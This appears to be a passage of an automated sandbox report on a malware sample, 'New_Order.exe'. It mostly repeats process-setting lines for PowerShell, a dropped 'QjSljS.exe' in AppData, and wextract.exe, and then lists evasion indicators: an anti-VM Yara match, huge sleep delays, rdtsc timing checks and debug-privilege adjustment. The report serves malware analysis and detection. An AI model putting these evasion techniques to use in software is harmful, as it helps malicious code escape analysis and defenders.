            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wextract.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: New_Order.exe PID: 7360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: QjSljS.exe PID: 7860, type: MEMORYSTR
            Source: C:\Users\user\Desktop\New_Order.exe TID: 7380Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 7146 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 375 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe TID: 7912Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084Thread sleep count: 185 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084Thread sleep time: -370000s >= -30000s
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084Thread sleep count: 9787 > 30
            Source: C:\Windows\SysWOW64\wextract.exe TID: 2084Thread sleep time: -19574000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828Thread sleep time: -32000s >= -30000s
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe TID: 5828Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\wextract.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C096E rdtsc 10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7146Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 375Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7138Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeWindow / User API: threadDelayed 9787
            Source: C:\Users\user\Desktop\New_Order.exeAPI coverage: 1.4 %
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeAPI coverage: 0.4 %
            Source: C:\Users\user\Desktop\New_Order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4166074080.0000000000E8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C096E rdtsc 10_2_012C096E
            Source: C:\Users\user\Desktop\New_Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
